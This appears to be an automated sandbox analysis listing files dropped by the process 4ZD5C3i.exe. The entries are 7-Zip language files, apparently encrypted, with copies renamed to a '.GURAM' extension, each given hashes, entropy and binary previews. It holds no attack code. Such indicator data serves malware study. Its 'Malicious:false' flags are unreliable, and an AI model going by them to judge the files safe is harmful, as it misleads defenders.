                                                                                                                                                                                                                                                SSDEEP:192:roe38J8Eby7OJdOycAzJuZzhXZyEYANMvNWIHoc/A2zDAggMNYpXAuRUQ:Ue38OZ7WJzOhXZJNH+5DAgg73WQ
                                                                                                                                                                                                                                                MD5:17F2730983D1064022A282EC22C1715A
                                                                                                                                                                                                                                                SHA1:23FB995CB13657F2B4C4362AC04C26DFC60A6D20
                                                                                                                                                                                                                                                SHA-256:CC7049E0D45AC70657603E76607519300F0B4DF7F6226D35B96D62E982EF4298
                                                                                                                                                                                                                                                SHA-512:FD1660886B3184D2D8D05A9FC97F19F1BDBB70A2F0B78737479F4D570E12DC3C4A89F11412E17EAD67ADBDF872D68E0E97DCCDB03C034B03F7607925AB6E946C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.Bpjr..p.R.l.Z.8yk`..>.T}...X.......I..d.f.G..>.......u.8'...Xx..=o...`.Y.t.`..b.+N....7@..h..b.:....z2Y....V....r..7....om.P.......A..4....y..4.....].....g.t.D..F..$%.`+.D$..+.uN...8G.o...i.W:..eI.&...A....a..d.....c3.Y..............HL}......+.Yq0..........f......yQ..T.M....6.r..A0Vi.n... ....o.);.U.z4.W..%...S..n..N*...e.......z.B...@...0.f.3....#.>.......V.LJ@.x6.. .0......z.,.pf~I..,.$u.l.,....h.:..!...3.Q...%.C...8-..O.U}k........./M....L$..L..."z..S^.......u/......q..C2.......3`J.@..].m.~.i.g].W...../m..NQti.6{0.@:.....z...1.b?.!0rK....Hw.D7....w..&.,........%.h0..}.6.-,..r./Y.pGy.[o...!.}....<JpU.|..V...b..'..VQ.2.``......1%..%quw4H.....H.....<..>D...&.4..FB|............"....`.)..6..).....\....6.5QH......^.....C.v...V.....*.......qw4!`....()[..{...y.~v..2...".9.K.".mP.I.0.}..A#o...Hg.BFu..i..w.*.Y.+......zX/...Y..-.'.u.~...s....T.a.6...~Y.%....6(..qY......$..MZ..6..~..I..6.AU6..NK@C.-.....oWYFg.Cd.-..T...=.+....u.Ug....E...ih.%..!M.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\hu.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10785
                                                                                                                                                                                                                                                Entropy (8bit):7.983329497125584
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:FL7NXaAvrB2PYJq2v7KIc9+jyrmuOXQ+Th2w7PFFVPdOZAZjgJocX/uUX:FPNaAvr3k22Ic9+lQBw7rVPnjUXNX
                                                                                                                                                                                                                                                MD5:A00D0D682A566CDD54A02C50C4EEA54C
                                                                                                                                                                                                                                                SHA1:0AE785392FA9B8DAB0458A58AD1B5737C42B7A90
                                                                                                                                                                                                                                                SHA-256:A16C40633C88A37B74771ED61D1002F9C3647A17AEA544CF46C17B10298C4169
                                                                                                                                                                                                                                                SHA-512:5F6F1FA7DD3FFE1B303C1740211F29DE89F39344F4750270CEFCECE78A971FC93F5E1D18CB6D21992B7F04F8C749A8BB306958E0C305880BD0526AB1EC182966
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:g.......iO..W...xZ....-{4\...}D...z.D.=)K..I.0Z8.t....D^...>..a... .......;...ghu+...p...'..)u...U...J[...7....[.....R..B.....J....mI...$....!....Z.K.`c.m..........^[.=.)j...b..,.(.[.bK}u.O.(..GNc...KG;.........q..."EV..&.....Z....9O.J.)-........'.+~..]..7?..`.]...p.s.4mo&.....j...xg..y{E.^..5i..w.i..A...`.~e............l.....;]j.@.._....?...........G.O.|..8T.......2._.................B.)6.U.%1e...E.[oa.Y.1.k........<..^B.B-.D..j./..o..b.E..ZZ..XU.DH~.V.s.....7..x(s.a....8...L.[#.`.@.*.\......v.E......y.R........qkkf.....Kkh..2..e...d..geI.".E.W..X.Sj...]..5p...b./..=..x)9..c...j6)=.4)Z.n..I....).w...@.z..;...4..'\4...AXna...X.IQ.X......^..U.;4~...L..S.LS.sj}.....#..z.......Sn....K...]v2..%...7m.nU.9..0..bs..j."....F...:..sM:.....6.Y...9A.w.DR.nD..L^..K.....I=vfd[.C@.\..1@&.$.. .?{..J....K...M.(Z.J.....>..0?.N)A.U0.l..B.R.r!.1.#[.&5..q.D.&...V...(...J..{a.C...~...N~r...o..._.3..6.J..*.N....?I....c.........E...Z,..;`.#../..IVx.U..%'..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\hu.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10785
                                                                                                                                                                                                                                                Entropy (8bit):7.983329497125584
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:FL7NXaAvrB2PYJq2v7KIc9+jyrmuOXQ+Th2w7PFFVPdOZAZjgJocX/uUX:FPNaAvr3k22Ic9+lQBw7rVPnjUXNX
                                                                                                                                                                                                                                                MD5:A00D0D682A566CDD54A02C50C4EEA54C
                                                                                                                                                                                                                                                SHA1:0AE785392FA9B8DAB0458A58AD1B5737C42B7A90
                                                                                                                                                                                                                                                SHA-256:A16C40633C88A37B74771ED61D1002F9C3647A17AEA544CF46C17B10298C4169
                                                                                                                                                                                                                                                SHA-512:5F6F1FA7DD3FFE1B303C1740211F29DE89F39344F4750270CEFCECE78A971FC93F5E1D18CB6D21992B7F04F8C749A8BB306958E0C305880BD0526AB1EC182966
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:g.......iO..W...xZ....-{4\...}D...z.D.=)K..I.0Z8.t....D^...>..a... .......;...ghu+...p...'..)u...U...J[...7....[.....R..B.....J....mI...$....!....Z.K.`c.m..........^[.=.)j...b..,.(.[.bK}u.O.(..GNc...KG;.........q..."EV..&.....Z....9O.J.)-........'.+~..]..7?..`.]...p.s.4mo&.....j...xg..y{E.^..5i..w.i..A...`.~e............l.....;]j.@.._....?...........G.O.|..8T.......2._.................B.)6.U.%1e...E.[oa.Y.1.k........<..^B.B-.D..j./..o..b.E..ZZ..XU.DH~.V.s.....7..x(s.a....8...L.[#.`.@.*.\......v.E......y.R........qkkf.....Kkh..2..e...d..geI.".E.W..X.Sj...]..5p...b./..=..x)9..c...j6)=.4)Z.n..I....).w...@.z..;...4..'\4...AXna...X.IQ.X......^..U.;4~...L..S.LS.sj}.....#..z.......Sn....K...]v2..%...7m.nU.9..0..bs..j."....F...:..sM:.....6.Y...9A.w.DR.nD..L^..K.....I=vfd[.C@.\..1@&.$.. .?{..J....K...M.(Z.J.....>..0?.N)A.U0.l..B.R.r!.1.#[.&5..q.D.&...V...(...J..{a.C...~...N~r...o..._.3..6.J..*.N....?I....c.........E...Z,..;`.#../..IVx.U..%'..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\hy.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):14745
                                                                                                                                                                                                                                                Entropy (8bit):7.987398813762329
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:Z/Dbn9CXWvhzCfhfzwGfYHe/yZP7k97fKNp:ZVCXWZzYhLwEKB7orCp
                                                                                                                                                                                                                                                MD5:7A83E1342B41B294DC1DFEA28EE3A32E
                                                                                                                                                                                                                                                SHA1:879FC65105D17BCF9A1F1CC5CEB485E8AB0C760F
                                                                                                                                                                                                                                                SHA-256:9026970EDFE1D95EDBCD555ACEB702F95FEDC57F1A1636F830E73064A6B0F581
                                                                                                                                                                                                                                                SHA-512:7EAACBAF81C556B678EB2AC2EAEA38D6AEE3B3E9D2E9104F011E0F96E9DC4055CCFC2F6A43D728D3B30675EA694EAE93066B4AC25A877B83382B1610913C9055
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..;..........{.\PI...U-...}hk...wB..T..Ev7..1.....).w.........V.8Z.0...'...{....G'].G..+..o..Y+..e...^8K.q*..X......Hs.;....Hm.........(...3......0..w.....h.p..../..v..G.....l..../...|.y.1.....a.82..../.s.. ....D;.........#$.G..<\.R.U....|..{.uum.b1L..H.\.%.n...@p\-..4.z..,......=Pv.e.|9wKX.t...9.T.M)Yw:.f....3.O/........M6..j..'...8S...*...8*.m.g..k+.@8V.\p...m3..,.5..k..Zy.!....UT.f...:.)....!.G_.@B..s...%.kTp=XSTc..zAf;..D.p.r..i.)........l.T..<...5B....=..vO.i.T/.....osO....L..*.S0..1h......g.M.;d....].1B.lj.....c.>.KW=..k.....I.K.AJ.G....3.e.JLn.(o..AD..}?:... .G.0...^Q.O.e1EA..HW^.3C(..u.U~Z~...6s..}...h..^8.......:.....j....\B......R.."*......s....M..u&.......b..s9.....?\oS...*....',L.....Q.W.......GT..-...6..=. ..&.@..r...\=.x.gl.\h......aM.>.z..r..8..&....2.......8I........b!.dt.C.\yk.@i.a...h...g....%..?9.YK..s..........j.Y@.1..~g-..-...'...9...e.....@d.....a.!^....1..Gf.RA.`..6.NR.......{...W.p,.q|....=;O........ ...r

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\hy.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):14745
                                                                                                                                                                                                                                                Entropy (8bit):7.987398813762329
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:Z/Dbn9CXWvhzCfhfzwGfYHe/yZP7k97fKNp:ZVCXWZzYhLwEKB7orCp
                                                                                                                                                                                                                                                MD5:7A83E1342B41B294DC1DFEA28EE3A32E
                                                                                                                                                                                                                                                SHA1:879FC65105D17BCF9A1F1CC5CEB485E8AB0C760F
                                                                                                                                                                                                                                                SHA-256:9026970EDFE1D95EDBCD555ACEB702F95FEDC57F1A1636F830E73064A6B0F581
                                                                                                                                                                                                                                                SHA-512:7EAACBAF81C556B678EB2AC2EAEA38D6AEE3B3E9D2E9104F011E0F96E9DC4055CCFC2F6A43D728D3B30675EA694EAE93066B4AC25A877B83382B1610913C9055
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..;..........{.\PI...U-...}hk...wB..T..Ev7..1.....).w.........V.8Z.0...'...{....G'].G..+..o..Y+..e...^8K.q*..X......Hs.;....Hm.........(...3......0..w.....h.p..../..v..G.....l..../...|.y.1.....a.82..../.s.. ....D;.........#$.G..<\.R.U....|..{.uum.b1L..H.\.%.n...@p\-..4.z..,......=Pv.e.|9wKX.t...9.T.M)Yw:.f....3.O/........M6..j..'...8S...*...8*.m.g..k+.@8V.\p...m3..,.5..k..Zy.!....UT.f...:.)....!.G_.@B..s...%.kTp=XSTc..zAf;..D.p.r..i.)........l.T..<...5B....=..vO.i.T/.....osO....L..*.S0..1h......g.M.;d....].1B.lj.....c.>.KW=..k.....I.K.AJ.G....3.e.JLn.(o..AD..}?:... .G.0...^Q.O.e1EA..HW^.3C(..u.U~Z~...6s..}...h..^8.......:.....j....\B......R.."*......s....M..u&.......b..s9.....?\oS...*....',L.....Q.W.......GT..-...6..=. ..&.@..r...\=.x.gl.\h......aM.>.z..r..8..&....2.......8I........b!.dt.C.\yk.@i.a...h...g....%..?9.YK..s..........j.Y@.1..~g-..-...'...9...e.....@d.....a.!^....1..Gf.RA.`..6.NR.......{...W.p,.q|....=;O........ ...r

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\id.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9270
                                                                                                                                                                                                                                                Entropy (8bit):7.981849277921527
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:vE44zs5Ey3cReIjLJWgQd85t0yarNW+X6uswDIaOirgyW48U6:xT9avBQd85t0yYYXusZaOlyWi6
                                                                                                                                                                                                                                                MD5:1E9B139D3FE2D7535255E53461B6C36C
                                                                                                                                                                                                                                                SHA1:FB6F045924810236A217B327AAF7C6C0D23EAF3F
                                                                                                                                                                                                                                                SHA-256:0DA59A0621F4B68574A89EF62C99F12F4DCFFD04623D6548254ED5A76C655249
                                                                                                                                                                                                                                                SHA-512:DDFFA3631E4B1E60A3A8A23118793BC4628022C1E099112C7B538EAADB7CDBFED9773C11AF0CF0D7F9CA5853BBCDF003C9F21154E949FB742DE2B59BA920EF0A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.=.Ut..4U...3.........0BLJT..m.................L..?.\...v..w.\6...Gy-..N/.r.<I..r-......1L.%.b6....JG.m3....g..G9t.a..p...d....u.j..u....._..TZ.b.$..C5\}......7D.n7{.....%..l...)..Cd..+~.C....|....U.?-.....!K:r=.. ..g..r..(,'..b.......a..../J7$.($..tqV.b....B....T./.. C#:..d.....ICi...M..1..u..,..[&....... ..b../...7P....6..6....S...{.{.f.V7Q.F...gX........F.9...g...zk....5...Mm....`.v...,A.Ia1.Y......X....Y.}....XC..8.....k..'...O....!^,M..3.c..U......$"..l...3a.h..G.R.....e..1%H\)bn..R8..q.N .|u.OG.@.i.0.QT|9..a..P..zM.ag]$.a..%.SB)H+..oY[....En..?..l.a...(..h..>e....h.<....a...g_....=...+...':....ir..a4.N}..tj...86.~U...+>..B..._..k.f..:...;H...?..<.a;.._.N.".....\.~!.7@h....H.`..Q...A..j|..W_.SZ."...4,....l.|...;...<.f.K.._..Y....Z/.D..-..j.J..p...........4b}.cI.4......,d.I4.bP..rW...8....".8.^C^..0..........Z...^ng..9;.<.uS..o1....|.PXdj...!..b....p..J.D$e9....oS.(..0eX.l...G].O-).=...#p^K..eK....}.O.Q.!..C...Fk.Q.c...o>M.S.....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\id.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9270
                                                                                                                                                                                                                                                Entropy (8bit):7.981849277921527
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:vE44zs5Ey3cReIjLJWgQd85t0yarNW+X6uswDIaOirgyW48U6:xT9avBQd85t0yYYXusZaOlyWi6
                                                                                                                                                                                                                                                MD5:1E9B139D3FE2D7535255E53461B6C36C
                                                                                                                                                                                                                                                SHA1:FB6F045924810236A217B327AAF7C6C0D23EAF3F
                                                                                                                                                                                                                                                SHA-256:0DA59A0621F4B68574A89EF62C99F12F4DCFFD04623D6548254ED5A76C655249
                                                                                                                                                                                                                                                SHA-512:DDFFA3631E4B1E60A3A8A23118793BC4628022C1E099112C7B538EAADB7CDBFED9773C11AF0CF0D7F9CA5853BBCDF003C9F21154E949FB742DE2B59BA920EF0A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.=.Ut..4U...3.........0BLJT..m.................L..?.\...v..w.\6...Gy-..N/.r.<I..r-......1L.%.b6....JG.m3....g..G9t.a..p...d....u.j..u....._..TZ.b.$..C5\}......7D.n7{.....%..l...)..Cd..+~.C....|....U.?-.....!K:r=.. ..g..r..(,'..b.......a..../J7$.($..tqV.b....B....T./.. C#:..d.....ICi...M..1..u..,..[&....... ..b../...7P....6..6....S...{.{.f.V7Q.F...gX........F.9...g...zk....5...Mm....`.v...,A.Ia1.Y......X....Y.}....XC..8.....k..'...O....!^,M..3.c..U......$"..l...3a.h..G.R.....e..1%H\)bn..R8..q.N .|u.OG.@.i.0.QT|9..a..P..zM.ag]$.a..%.SB)H+..oY[....En..?..l.a...(..h..>e....h.<....a...g_....=...+...':....ir..a4.N}..tj...86.~U...+>..B..._..k.f..:...;H...?..<.a;.._.N.".....\.~!.7@h....H.`..Q...A..j|..W_.SZ."...4,....l.|...;...<.f.K.._..Y....Z/.D..-..j.J..p...........4b}.cI.4......,d.I4.bP..rW...8....".8.^C^..0..........Z...^ng..9;.<.uS..o1....|.PXdj...!..b....p..J.D$e9....oS.(..0eX.l...G].O-).=...#p^K..eK....}.O.Q.!..C...Fk.Q.c...o>M.S.....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\io.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5616
                                                                                                                                                                                                                                                Entropy (8bit):7.968329509490862
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:Sg7C/o7Clxh4dzuLh2wzK2IXe2YN1+YZNOJ+etFYCRrsh0pxfU0lec:pUoGzCtog7vXaNs26+etRNsAU0Uc
                                                                                                                                                                                                                                                MD5:15539AB2B7C9C76D586071EC93D97636
                                                                                                                                                                                                                                                SHA1:A9E075AD85DCB67B4969004AC8E7CC1345B405B2
                                                                                                                                                                                                                                                SHA-256:BCB985D9B5C2EAC682CD35A23E7DF512FC803F9E6124075EE2789153096E145C
                                                                                                                                                                                                                                                SHA-512:CE39E19FC37728007AC36F6884BFD2D03F9AE3BE752CB0313EB2E3B2EAEC10044848AD02FB04592EA84EF2FFD0E7DE23D294382D4F88E20F2B4B25E2A535F018
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.Fl.n.P.CxCS#*p...2..H.."DU..SA..juY*.[v.....<..k:.....9.D...W..*.U..#....@qh.q.du.{>Q..%I.C...F=.....1...B.I.....z.\.U..n..}.......$,......@$........Ar.~...W@....m..vf.9...D.....i.]@6a..8....5..Wf......F...].F.E...z....0.+v".9m......HX..H....I...x.T...3..l?...[.7.i.&..Kd...V..(..<f.}.E.......R..I6.F.!....`....D..4.Z'..A.......3.^1n...I.59`.0...YT.:/..[XEo..7..M.=%m.r.c...a1\)..........H.U.J........v6...Ei...;`.bD..l...=.f\..Gr.5v]....a8....o..-^.8..Qw.E..f.O.C...U.M...[w...;...]\.cY.f.........w..)gu.6.B.6.D.......8...w....g...(..K.<.9...].*_...a......U..........A}..TpL.Q9E.j.S*yQ]...V........ .,....d|.O.1.z......Rj...O.Y..ho...t<.MiC.c'.1.<..(.+.wd...'.....1h..x..H....~..6.w...^.C%.. j........?-.}.U.T.u0.YY.R..s<\Eu).........R<P.TQp.....K.g.......I=...f.;...Y?x).<f.....r...gC.....r...c.R"$....%....R.R..j.9.=...,.H#].J.1#U....G.;a.[~S..G.c.=f...4...*x..,.W.r_W.Q..+n..=....DW........:.xT...n.8..}..l..M....~$jra].....7..J..a........Et.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\io.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5616
                                                                                                                                                                                                                                                Entropy (8bit):7.968329509490862
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:Sg7C/o7Clxh4dzuLh2wzK2IXe2YN1+YZNOJ+etFYCRrsh0pxfU0lec:pUoGzCtog7vXaNs26+etRNsAU0Uc
                                                                                                                                                                                                                                                MD5:15539AB2B7C9C76D586071EC93D97636
                                                                                                                                                                                                                                                SHA1:A9E075AD85DCB67B4969004AC8E7CC1345B405B2
                                                                                                                                                                                                                                                SHA-256:BCB985D9B5C2EAC682CD35A23E7DF512FC803F9E6124075EE2789153096E145C
                                                                                                                                                                                                                                                SHA-512:CE39E19FC37728007AC36F6884BFD2D03F9AE3BE752CB0313EB2E3B2EAEC10044848AD02FB04592EA84EF2FFD0E7DE23D294382D4F88E20F2B4B25E2A535F018
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.Fl.n.P.CxCS#*p...2..H.."DU..SA..juY*.[v.....<..k:.....9.D...W..*.U..#....@qh.q.du.{>Q..%I.C...F=.....1...B.I.....z.\.U..n..}.......$,......@$........Ar.~...W@....m..vf.9...D.....i.]@6a..8....5..Wf......F...].F.E...z....0.+v".9m......HX..H....I...x.T...3..l?...[.7.i.&..Kd...V..(..<f.}.E.......R..I6.F.!....`....D..4.Z'..A.......3.^1n...I.59`.0...YT.:/..[XEo..7..M.=%m.r.c...a1\)..........H.U.J........v6...Ei...;`.bD..l...=.f\..Gr.5v]....a8....o..-^.8..Qw.E..f.O.C...U.M...[w...;...]\.cY.f.........w..)gu.6.B.6.D.......8...w....g...(..K.<.9...].*_...a......U..........A}..TpL.Q9E.j.S*yQ]...V........ .,....d|.O.1.z......Rj...O.Y..ho...t<.MiC.c'.1.<..(.+.wd...'.....1h..x..H....~..6.w...^.C%.. j........?-.}.U.T.u0.YY.R..s<\Eu).........R<P.TQp.....K.g.......I=...f.;...Y?x).<f.....r...gC.....r...c.R"$....%....R.R..j.9.=...,.H#].J.1#U....G.;a.[~S..G.c.=f...4...*x..,.W.r_W.Q..+n..=....DW........:.xT...n.8..}..l..M....~$jra].....7..J..a........Et.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\is.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9354
                                                                                                                                                                                                                                                Entropy (8bit):7.978948067003446
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:Pyr+RXpDIWf4yTqkyjBU9TypbAsipxKYwtYMkttko5G8OqrbPMUQ:KrIXpDCymcTypgWrtY/tbbQ
                                                                                                                                                                                                                                                MD5:1A2C6B4A739730666C335944B0834F95
                                                                                                                                                                                                                                                SHA1:9061C5F712326D1CC57CAB423645597E44CB56E5
                                                                                                                                                                                                                                                SHA-256:63893EDB62C9B1DA01C2316B8713444346D45D2F392C629B94573EC0A95A1319
                                                                                                                                                                                                                                                SHA-512:76943015FD124EDF1A1C9E22F676F3548CC3CFE09D633772CA8F5316B5923B379FFB6E577C66CA1F2463F2CAF88715AADB6F266B72F8794CE00713F10A50F1A8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:./...:.....?......T....2..{m.!.3G....P.\..q.....0....w8.V....!Y.@...&.q...{C..../..k.S.fKy.E._3W.....}....._.!(.a.4.~yj.]1..Z-..F..];.........|..6...(s...2|..6.L....@4k,....o*pf..>G.B$4l..i..(,*....b)Gz:.%......4.!....>..j...%.4bp...y..fJ... C../".....M".G.A.K.....#....{.......8..dD.>......R5.t..}...K.W.........;...?f4..c.avi...).L.B..jA....(.y....!%.d...G,...j..z.V...X.Y...=Y|H...R.Y.........'......cU...}.J...r.,.@........'..*......-........Y)u....K..'o.J.O..j.%6....<./.../...D.oc.S%e......E.T....k......X.Fx)...Q....7....qK.wlx N...7c..... '.....).l".}.w.....p&.m.....|N..\...5.c.........=+...Y.b!..........Y....3crq.m....3 G.\... c3...M4.....1./j....L..?..9.!..Q....=j..u.........`f...,.<.A...).HuEo.CK...d_..............o......%..K..T3......a.F1...9.I...a..t..F~..D..(C.........S.p.H.Y...s....y..g.CFn.})Z..x,Jr.`k........UZ.m..D-.1N.....M5....)7..i+<...Vc@..S]..m.H....'....@.GyEjm.....@......fA.1.'...'=<..d..J........iPKq..#..ZH<.T....n;.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\is.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9354
                                                                                                                                                                                                                                                Entropy (8bit):7.978948067003446
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:Pyr+RXpDIWf4yTqkyjBU9TypbAsipxKYwtYMkttko5G8OqrbPMUQ:KrIXpDCymcTypgWrtY/tbbQ
                                                                                                                                                                                                                                                MD5:1A2C6B4A739730666C335944B0834F95
                                                                                                                                                                                                                                                SHA1:9061C5F712326D1CC57CAB423645597E44CB56E5
                                                                                                                                                                                                                                                SHA-256:63893EDB62C9B1DA01C2316B8713444346D45D2F392C629B94573EC0A95A1319
                                                                                                                                                                                                                                                SHA-512:76943015FD124EDF1A1C9E22F676F3548CC3CFE09D633772CA8F5316B5923B379FFB6E577C66CA1F2463F2CAF88715AADB6F266B72F8794CE00713F10A50F1A8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:./...:.....?......T....2..{m.!.3G....P.\..q.....0....w8.V....!Y.@...&.q...{C..../..k.S.fKy.E._3W.....}....._.!(.a.4.~yj.]1..Z-..F..];.........|..6...(s...2|..6.L....@4k,....o*pf..>G.B$4l..i..(,*....b)Gz:.%......4.!....>..j...%.4bp...y..fJ... C../".....M".G.A.K.....#....{.......8..dD.>......R5.t..}...K.W.........;...?f4..c.avi...).L.B..jA....(.y....!%.d...G,...j..z.V...X.Y...=Y|H...R.Y.........'......cU...}.J...r.,.@........'..*......-........Y)u....K..'o.J.O..j.%6....<./.../...D.oc.S%e......E.T....k......X.Fx)...Q....7....qK.wlx N...7c..... '.....).l".}.w.....p&.m.....|N..\...5.c.........=+...Y.b!..........Y....3crq.m....3 G.\... c3...M4.....1./j....L..?..9.!..Q....=j..u.........`f...,.<.A...).HuEo.CK...d_..............o......%..K..T3......a.F1...9.I...a..t..F~..D..(C.........S.p.H.Y...s....y..g.CFn.})Z..x,Jr.`k........UZ.m..D-.1N.....M5....)7..i+<...Vc@..S]..m.H....'....@.GyEjm.....@......fA.1.'...'=<..d..J........iPKq..#..ZH<.T....n;.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\it.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:SysEx File - AKG
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10358
                                                                                                                                                                                                                                                Entropy (8bit):7.97817832472156
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:a3j9HBZBvoq+uVL/23AVGlPpmFXRAziCCN222h6opFjUqkbpZz0BUz:azhBT6ut5BbFwbURJvz
                                                                                                                                                                                                                                                MD5:0AED43C67AE0228AED0A7DF4BE927FAE
                                                                                                                                                                                                                                                SHA1:B23B92C7743BE6074ADDC4B7C83A4730246F6C9A
                                                                                                                                                                                                                                                SHA-256:EE8362D35D93064E85347CAB28C3009782B9881981F02DD1D433ED193DE10ADA
                                                                                                                                                                                                                                                SHA-512:388F0794DFEECCA266084B7AB6C9A657E55CFA53EFAD7248CD0372A92FF2E1F60D16FBC5D152A48F4938E0A06D84678B1049573B9BDED6BAF16BDA7F89FA52F8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
